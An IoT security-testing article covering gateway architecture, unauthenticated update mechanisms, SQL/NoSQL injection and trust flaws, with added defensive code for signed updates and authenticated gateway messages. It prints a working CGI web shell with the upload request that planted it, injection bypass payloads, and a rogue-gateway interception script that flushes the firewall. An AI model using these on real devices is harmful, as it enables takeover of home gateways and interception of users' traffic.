Preface
Earlier this year I was involved in a number of security tests of Internet of Things solutions, with the primary goal of identifying vulnerabilities in their architecture and implementation. In this article I discuss some of the issues and challenges I found in IoT solutions.
What is the Internet of Things?
When you learned about IPv6, your teacher may have told you that one day every device in your house will have its own IP address. The Internet of Things is essentially about taking everyday objects and connecting them to the Internet. Common networked things include lighting, curtains and air conditioning; less common ones include refrigerators and even bathrooms.
The Internet of Things is defined as "the development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data."
The architecture of the Internet of Things
An IoT solution usually has five parts:
Actuators: control things through a physical process, such as air-conditioning units, locks and curtains.
Gateways: collect the sensor information and act as the control centre for the actuators.
Sensors: detect the environment, such as light, motion, temperature, humidity, and water or electricity usage.
Cloud: a web interface or API hosted in the cloud, running the web application and the analysis of the large data sets that are collected; in general this is where information and other resources are shared.
Mobile (app): a mobile application that lets the user interact with and control the IoT environment from a phone.
The following wireless protocols (among others) are commonly used between the gateway and the sensors and actuators in the IoT environment itself:
WiFi
Z-Wave
ZigBee
Bluetooth
RF433
Each protocol has its pros and cons, and each comes with its own limitations. When it comes to choosing a protocol, the biggest problem is compatibility. The following table shows a quick comparison between the protocols:
The main driver for choosing a specific protocol is what it supports. For example, RF433 is used for a wide range of purposes, but it has no mesh networking and no default security mechanism. This means that if you want security you have to come up with your own protocol on top of it, which in turn means your users cannot simply use off-the-shelf sensors or devices. ZigBee and Z-Wave are to a large extent the same; the main difference between them is the communication range of the equipment.
You can learn more from the ZigBee security technology white paper, and there is a related document here.
Threat vectors
Any security assessment requires you to know who your adversaries are, how they would attack the system and how they could misuse it. When I build a threat model, I consider the information the device holds, the environment it lives in, and where all of this could pose a risk. A compromised IoT device may be used to target the environment it is in, or simply become part of a botnet used to attack external networks (or both). You should evaluate what can affect the actuators, and how manipulated sensor values could affect the environment. To do this you have to understand how the IoT ecosystem works, what types of devices may be used, and how the impact could spread.
Common vulnerabilities in Internet of Things solutions:
Unauthenticated update mechanism
SQL/JSON injection
Design logic and too much trust
Unauthenticated update mechanism
There are many different ways to deliver updates. Some solutions use the traditional package manager of the Linux system; others use less traditional tools, such as an executable that runs on a computer on the same network and pushes updates retrieved from the cloud. The biggest problem with these newer mechanisms is that they do not use a secure means of delivering the software package. One solution, for example, used a single executable that accessed a hidden API to replace files on the gateway. All you need to do is upload a CGI file to replace an existing one. In this particular case the gateway ran CGI scripts with the shell, so you can upload your own shell:
#!/bin/sh
# Minimal CGI web shell: whatever is in the query string gets executed.
echo -e "Content-type: text/html\r\n\r\n"
echo "Blaat"
#echo "$QUERY_STRING"
CMD="$QUERY_STRING"
# Strip backslashes and decode %20 back to spaces before running it.
test2=$(echo "$CMD" | sed 's|[\\]||g' | sed 's|%20| |g')
$test2
Request:
POST http://192.168.1.98:8181/fileupload.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=------7cf2a327f01ae
User-Agent: REDACTED
Host: 192.168.1.98:8181
Content-Length: 482
Pragma: no-cache

--------7cf2a327f01ae
Content-Disposition: form-data; name="auth"

11366899
--------7cf2a327f01ae
Content-Disposition: form-data; name="type"

w
--------7cf2a327f01ae
Content-Disposition: form-data; name="file"; filename="C:\REDACTED configurator\output\login.cgi"

#!/bin/sh
echo -e "Content-type: text/html\r\n\r\n"
echo "Blaat"
#echo "$QUERY_STRING"
CMD="$QUERY_STRING"
test2=$(echo "$CMD" | sed 's|[\\]||g' | sed 's|%20| |g')
$test2
--------7cf2a327f01ae--
You should be able to guess what happens next:
My advice is to take advantage of existing solutions such as the distribution's package manager, and if you have to roll your own update mechanism, verify the package (its signature and the integrity of every file in it) before you install it.
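The following is an added example of what "verify before you install" looks like on the gateway side; it is not code from the article or from the product that was tested. It assumes (my assumptions) that an update is a zip containing a manifest listing every file with its SHA-256, a detached signature over that manifest, and the files themselves. The signature here is an HMAC-SHA256 with a key provisioned on the gateway, standing in for the public-key signature (for example Ed25519, verified with a public key burned into the firmware) a real design would use so the gateway holds nothing that can sign. The checks are the ones the attack above gets past: authenticity of the manifest, no rollback, no files the manifest does not vouch for, no path that escapes the update root (so an uploaded `login.cgi` cannot land in `cgi-bin`), and per-file hashes bound to the signed manifest.

```python
import hashlib
import hmac
import io
import json
import zipfile

MANIFEST = "manifest.json"
SIGNATURE = "manifest.sig"


class UpdateError(Exception):
    """Any reason the package must not be installed."""


def sign_manifest(key, manifest_bytes):
    # Assumption: HMAC-SHA256 stands in for the vendor's asymmetric signature.
    return hmac.new(key, manifest_bytes, "sha256").hexdigest()


def build_package(files, version, signing_key):
    """Vendor side (constructed only to produce input for the check below):
    a manifest listing every file with its SHA-256, signed as a whole."""
    manifest = {"version": version,
                "files": {p: hashlib.sha256(d).hexdigest() for p, d in files.items()}}
    manifest_bytes = json.dumps(manifest, sort_keys=True).encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(MANIFEST, manifest_bytes)
        z.writestr(SIGNATURE, sign_manifest(signing_key, manifest_bytes))
        for path, data in files.items():
            z.writestr(path, data)
    return buf.getvalue()


def replace_file(package, path, data):
    """What the attacker in the article did: swap one file inside the
    package without touching the manifest. Used only to exercise the checks."""
    src = zipfile.ZipFile(io.BytesIO(package))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name in src.namelist():
            z.writestr(name, data if name == path else src.read(name))
    return buf.getvalue()


def safe_relpath(path):
    """Only plain relative paths: no backslashes and no empty, '.' or '..'
    components, so nothing can escape the update root (e.g. '../login.cgi')."""
    if not path or "\\" in path:
        return False
    return all(part not in ("", ".", "..") for part in path.split("/"))


def verify_package(package, verify_key, installed_version):
    """Gateway side: returns {path: bytes} only when every check passes.
    Nothing is written to the filesystem until this function has returned."""
    try:
        z = zipfile.ZipFile(io.BytesIO(package))
        manifest_bytes = z.read(MANIFEST)
        sig = z.read(SIGNATURE).decode("ascii")
    except (zipfile.BadZipFile, KeyError, UnicodeDecodeError) as e:
        raise UpdateError(f"malformed package: {e}")
    # 1. Authenticity of the manifest before trusting anything in it.
    if not hmac.compare_digest(sign_manifest(verify_key, manifest_bytes), sig):
        raise UpdateError("manifest signature invalid")
    manifest = json.loads(manifest_bytes)
    # 2. Anti-rollback: a genuine but older package can reintroduce fixed bugs.
    version = manifest.get("version")
    if not isinstance(version, int) or version <= installed_version:
        raise UpdateError("package version is not newer than installed")
    listed = manifest.get("files", {})
    # 3. Exactly the files the manifest vouches for, nothing extra.
    if set(z.namelist()) != {MANIFEST, SIGNATURE} | set(listed):
        raise UpdateError("package contents do not match manifest")
    verified = {}
    for path, digest in listed.items():
        if not safe_relpath(path):
            raise UpdateError(f"unsafe path in manifest: {path!r}")
        data = z.read(path)
        # 4. Per-file integrity, bound to the signed manifest.
        if not hmac.compare_digest(hashlib.sha256(data).hexdigest(), digest):
            raise UpdateError(f"hash mismatch for {path}")
        verified[path] = data
    return verified


def is_rejected(package, verify_key, installed_version):
    """True if verify_package refuses the package (used for the demos below)."""
    try:
        verify_package(package, verify_key, installed_version)
    except UpdateError:
        return True
    return False


if __name__ == "__main__":
    key = b"key-provisioned-on-this-gateway"  # constructed sample key
    files = {"cgi-bin/login.cgi": b"#!/bin/sh\necho ok\n"}
    pkg = build_package(files, 2, key)
    print("genuine:", verify_package(pkg, key, 1) == files)
    print("tampered rejected:", is_rejected(replace_file(pkg, "cgi-bin/login.cgi", b"evil"), key, 1))
```

Only after `verify_package` returns should the files be written, and then to a staging directory that is swapped in atomically; the point of doing it this way round is that a file upload with a guessable auth value, as in the request above, never becomes executable content on the gateway.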
SQL/NoSQL injection
SQL injection has been around for a long time. The vulnerability arises because, during development, no attention is paid to how SQL statements are built or to filtering special characters, so that values submitted through POST and GET parameters end up being executed as part of the SQL statement. We still see it in a lot of solutions, and many developers either do not think this is a problem for NoSQL databases or simply do not know that it is. Here my advice is to make sure that proper input validation and filtering are done. There is no case study here, but you can look at this article on websecurify.
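As an added example (not from the article, and not from any product that was tested), here is the same login check written the vulnerable way and the safe way against an in-memory SQLite database, followed by the NoSQL/JSON variant, where the injected payload is not a quoted string but an operator object. The schema, users and the tiny document-store matcher are constructed for this example; the matcher imitates the `$ne` semantics of document databases so the bypass can be shown without a server.

```python
import json
import sqlite3


def make_db():
    """Constructed sample schema; passwords are stored in clear only to keep
    the injection point obvious (hash them in anything real)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return db


def login_vulnerable(db, user, password):
    """String-built SQL: a quote in the input becomes SQL syntax, so the
    password  ' OR '1'='1  turns the WHERE clause into (.. AND ..) OR true."""
    sql = (f"SELECT name FROM users WHERE name = '{user}' "
           f"AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, user, password):
    """Parameterised query: values travel separately from the statement,
    so whatever the input contains is compared as data, never parsed."""
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row is not None


# --- NoSQL / JSON variant -------------------------------------------------

USERS = [{"name": "admin", "password": "correct horse"}]


def nosql_match(doc, query):
    """Tiny stand-in for a document store's filter (constructed here): a
    scalar condition means equality, a dict is an operator such as $ne."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            if "$ne" in cond and value == cond["$ne"]:
                return False
        elif value != cond:
            return False
    return True


def login_nosql_vulnerable(body):
    """Decoded JSON goes straight into the filter, so the body
    {"name": "admin", "password": {"$ne": ""}} matches without a password."""
    q = json.loads(body)
    query = {"name": q["name"], "password": q["password"]}
    return any(nosql_match(u, query) for u in USERS)


def login_nosql_safe(body):
    """Validate shape and type before building the filter: only bounded,
    non-empty strings reach the query, never operator objects."""
    q = json.loads(body)
    name, password = q.get("name"), q.get("password")
    for value in (name, password):
        if not isinstance(value, str) or not 0 < len(value) <= 128:
            raise ValueError("name and password must be non-empty strings")
    query = {"name": name, "password": password}
    return any(nosql_match(u, query) for u in USERS)


if __name__ == "__main__":
    db = make_db()
    print("SQL bypass:", login_vulnerable(db, "admin", "' OR '1'='1"))
    print("SQL fixed:", login_safe(db, "admin", "' OR '1'='1"))
    payload = '{"name": "admin", "password": {"$ne": ""}}'
    print("NoSQL bypass:", login_nosql_vulnerable(payload))
```

The NoSQL case is the one developers tend to miss: no quote is ever injected, the JSON parser does the work, and the only defence is refusing anything that is not the expected scalar type before it reaches the query.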
Design logic and too much trust
Because there are no reference architectures available, we see a lot of different architectures. While a framework can make things easier, it can also be a big risk: a single compromised component can bring the whole solution down. In addition, we see developers assuming that anything other than traditional user input is not a threat. In one instance, when intercepting the communication between the gateway and the cloud, we noted that there was no authentication apart from the gateway identifier (which we could easily enumerate). This allowed us to inject information and to obtain information belonging to other users. Some other examples include:
mobile applications logging in directly to the database (all devices using the same password)
local network traffic left unencrypted
messages neither signed nor encrypted
easily brute-forced or irrevocable information (such as date of birth and name) used as an API key
identifying a user's gateway through security by obscurity
in-house developed cryptographic algorithms
My recommendation here is that input is validated and appropriately encoded at the receiving end so that malicious data is handled, which means that neither the client nor the server should trust what the other side provides. In general, use established validation and auditing frameworks. If the device is exposed to the network, do not expect any input to be trustworthy. Use appropriate encryption (HTTPS) for all communication, and refuse to connect if the certificate is invalid. Using an API key to identify a particular gateway is fairly common; because the server uses this identifier as the authentication token, you need to make sure it is randomly generated using a cryptographically secure RNG, generally 128 bits (32 hex characters). Finally, do not develop your own cryptographic algorithms: even the most renowned cryptographers cannot guarantee that their algorithms are one hundred percent secure.
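The gateway-to-cloud finding above (an enumerable gateway identifier accepted as the only authentication) and the recommendations that follow it can be put together in one place. The following is an added example of how the cloud side can authenticate a message from a gateway; it is not code from the article or from any product that was tested, and the message format, the registry and the way keys are provisioned are my assumptions. The gateway is identified by a 128-bit token from the OS CSPRNG rather than by a guessable ID, each message carries a timestamp and nonce and is authenticated with a per-gateway HMAC, MACs are compared in constant time, and a replayed or stale message is refused.

```python
import hmac
import json
import secrets
import time

MAX_SKEW = 300  # seconds a message may be old or early (assumed window)


class Registry:
    """Cloud-side enrolment records (constructed, in-memory stand-in)."""

    def __init__(self):
        self.by_token = {}  # api token -> (gateway_id, per-gateway MAC key)
        self.seen = {}      # gateway_id -> nonces already accepted

    def enroll(self, gateway_id):
        # The credential that identifies the gateway is random, not derived
        # from anything enumerable or irrevocable (serial, birth date, name).
        token = secrets.token_hex(16)    # 128 bits, 32 hex characters
        key = secrets.token_bytes(32)    # shared only with this gateway
        self.by_token[token] = (gateway_id, key)
        self.seen[gateway_id] = set()
        return token, key


def mac_for(key, body):
    return hmac.new(key, body, "sha256").hexdigest()


def gateway_send(token, key, payload, now=None):
    """Gateway side: wrap the payload with a timestamp and nonce, serialise
    canonically, and authenticate the exact bytes that will be sent."""
    envelope = {
        "ts": int(now if now is not None else time.time()),
        "nonce": secrets.token_hex(8),
        "payload": payload,
    }
    body = json.dumps(envelope, sort_keys=True, separators=(",", ":")).encode()
    return {"token": token, "body": body, "mac": mac_for(key, body)}


def cloud_receive(registry, msg, now=None):
    """Cloud side: returns (gateway_id, payload) or raises ValueError.
    The token is looked up, never trusted as an identity on its own."""
    token = msg.get("token")
    entry = registry.by_token.get(token) if isinstance(token, str) else None
    if entry is None:
        raise ValueError("unknown token")
    gateway_id, key = entry
    body = msg.get("body", b"")
    # Authenticate before parsing: nothing in the body is trusted until then.
    if not hmac.compare_digest(mac_for(key, body), str(msg.get("mac", ""))):
        raise ValueError("bad MAC")
    envelope = json.loads(body)
    now = int(now if now is not None else time.time())
    if abs(now - int(envelope["ts"])) > MAX_SKEW:
        raise ValueError("stale message")
    nonce = envelope["nonce"]
    if nonce in registry.seen[gateway_id]:
        raise ValueError("replayed message")
    registry.seen[gateway_id].add(nonce)  # a real store would expire these after MAX_SKEW
    return gateway_id, envelope["payload"]


if __name__ == "__main__":
    reg = Registry()
    token, key = reg.enroll("gw-0001")
    msg = gateway_send(token, key, {"actuator": "lock", "cmd": "open"})
    print("accepted:", cloud_receive(reg, msg))
    try:
        cloud_receive(reg, msg)
    except ValueError as e:
        print("second delivery refused:", e)
```

The same envelope works in the other direction for commands fetched by the gateway from the cloud, which is the channel the remote-control design below relies on; what matters is that authenticity is checked on the exact bytes received, before anything is parsed or acted on.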
Many users want to use their mobile phone to remotely control their home, for example to turn on the air conditioning or to open the door. This raises a problem: the gateway is typically located behind the home router and is not directly reachable from the Internet. Some solutions handle this with port forwarding, but that also requires a dynamic DNS solution that the user has to configure.
What most companies do instead is have the mobile app send its instructions to the cloud, and have the gateway fetch the instructions from the cloud.
Conclusions
People want to connect everything to the Internet, but serious security mistakes are common. Most of them are due to ambiguous security objectives and a lack of experience and awareness. Instead of expecting vendors to deliver security to us, we have to adopt a secure IoT strategy ourselves.
Some IoT security references:
GSMA IoT Security Guidelines - complete document set
OWASP Internet of Things (IoT) Project
AllJoyn Alliance (a framework under development to secure communication in the IoT environment)
IoTivity (soon to be merged with AllJoyn)
Finally, here is a script that turns a machine into a rogue gateway, so that traffic from an IoT device to the Internet passes through it and can be intercepted. It can be used for security testing:
#!/bin/sh
# Run as root. The IoT device is attached to the secondary interface, which
# becomes its default gateway; its traffic is then NATed out of the uplink
# interface, so it can be captured or proxied on this machine.
echo "Interface with Internet connectivity:"
read iInf
echo "Secondary interface with rogue device:"
read wInf
echo "Stopping network manager..."
service network-manager stop
echo "Stopping dnsmasq..."
service dnsmasq stop
echo "Bringing down secondary interface..."
ifconfig $wInf down
echo "Configuring secondary interface..."
ifconfig $wInf 192.168.1.1 netmask 255.255.255.0
echo "Starting dnsmasq as DHCP server..."
dnsmasq --no-hosts --interface $wInf --except-interface=lo \
  --listen-address=192.168.1.1 --dhcp-range=192.168.1.50,192.168.1.60,60m \
  --dhcp-option=option:router,192.168.1.1 --dhcp-lease-max=25 \
  --pid-file=/var/run/nm-dnsmasq-wlan.pid
echo "Stopping firewall and allowing everyone..."
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
echo "Enabling NAT..."
# Forwarding must be on for the device's packets to leave via the uplink.
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o $iInf -j MASQUERADE